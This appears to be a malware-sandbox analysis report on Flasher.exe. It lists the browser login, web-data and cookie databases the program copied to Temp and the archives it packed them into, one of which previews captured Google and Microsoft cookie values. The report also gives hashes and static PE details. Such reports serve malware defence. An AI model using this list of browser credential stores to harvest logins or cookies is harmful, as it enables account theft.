Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iridium_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\kometa_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\kometa_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\kometa_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\liebao_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mail.ru_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\microsoft_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\opera gx stable_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\opera stable_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\opera stable_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\opera stable_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\orbitum_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\out.zip

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	938450
Entropy (8bit):	7.965139198255806
Encrypted:	false
SSDEEP:	12288:0ohDfNc/PGaqTyzKX5o/i46oWb85BD4ojs4Wj9CJYT7RlXsVlf/RVF53NLMJkqz:0oJC/PRgyzi5oK85F4ojbWRSYT72d6Tz
MD5:	794C141621709509927B9120BD6982BC
SHA1:	4EA220DC6CBF859EDA79FDB0F5BD9BB751177540
SHA-256:	D0A154032DAD6FC2B621D73712C26FD15F7D15FBB5E261B0EE0F7499FAC55090
SHA-512:	FA40665B45702D027BB7B62779A87C31883D2A24DA9EC5055A66E783781DD46163135BB2D96CB632D91883A0E87769879DC1A61B97C1A9BD6803876AE10BB38F
Malicious:	false
Preview:	PK.........~.Y.:0.............cookies_google_default.txt.google.com.false./.TRUE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.true./.TRUE.13340887435186329..AspNetCore.AuthProvider.True.support.microsoft.com.true./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.true./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.true./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.false./.TRUE.13372

C:\Users\user\AppData\Local\Temp\qip surf_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sensfiles.zip

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	20386
Entropy (8bit):	5.0102132434779785
Encrypted:	false
SSDEEP:	384:uOl9tybTPHTPYvZR1lDOl9tybTPHTPYvZR1lQC:ugtyCPgtyCMC
MD5:	767176BA0DB3433DBEF1E4E57512D010
SHA1:	21EB8C247D83B8EAE9EBAAC46D977822882FBFA8
SHA-256:	B5708ACA155E0B7504B33EFFF5B165129DA1A7B56E3D1B5C9A7856EF875A0504
SHA-512:	D344E3FC13628A0E23489AF8C93A21CE377EEC2497A9379ED2510E4266AEE0745D95A560BDCDAD39C1ABF50C050790FB487D6A899C0131D89F49D9891D23880C
Malicious:	false
Preview:	PK.........Y.*.M............DTBZGIOOSO.docxDTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXD

C:\Users\user\AppData\Local\Temp\settings_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sputnik_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\torch_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ucozmedia_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vivaldi_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.5380227771096076
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Flasher.exe
File size:	3'266'048 bytes
MD5:	7a16f2f0629a440695945db2a191c6a1
SHA1:	067c54721377eeefd199acb37402308bdfe73b3b
SHA256:	989af492fa898868e67636bf47e06a7c5864f31849fc3b3a07b07e7a3a62d944
SHA512:	6b698efd1ce0c5ecce64ab63146fc04d9086f70075fc89482e4141b69c8e31327e28618f0f37bc89eadf5ae7211b282beb9b786c9b61e5008405add527a81e0c
SSDEEP:	49152:rvlat1Rsi9Zn31w7LsuPKdDeXid5506WGPmFaRa2M/S6vya7/fmzXt8g:e/ssn3QsaKJ9SasXv72zXt8g
TLSH:	0DE58D43F69445EAC06AC178C74B9323F772B88A0B24A79B17E48A713F57B611F2D358
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.......................~.......~.......~.......~.......................z...............z.......Rich....................PE..d..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140242750
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x676EC2CA [Fri Dec 27 15:07:54 2024 UTC]
TLS Callbacks:	0x400e6160, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	9ee638580f9771af3dc4c446e1a6db71

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FDA350C2AB8h
dec eax
add esp, 28h
jmp 00007FDA350C22E7h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
sub esp, 10h
dec esp
mov dword ptr [esp], edx
dec esp
mov dword ptr [esp+08h], ebx
dec ebp
xor ebx, ebx
dec esp
lea edx, dword ptr [esp+18h]
dec esp
sub edx, eax
dec ebp
cmovb edx, ebx
dec esp
mov ebx, dword ptr [00000010h]
dec ebp
cmp edx, ebx
jnc 00007FDA350C2488h
inc cx
and edx, 8D4DF000h
wait
add al, dh

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x304e44	0x1cc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x30e000	0xe298	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31d000	0x2ec4	.reloc
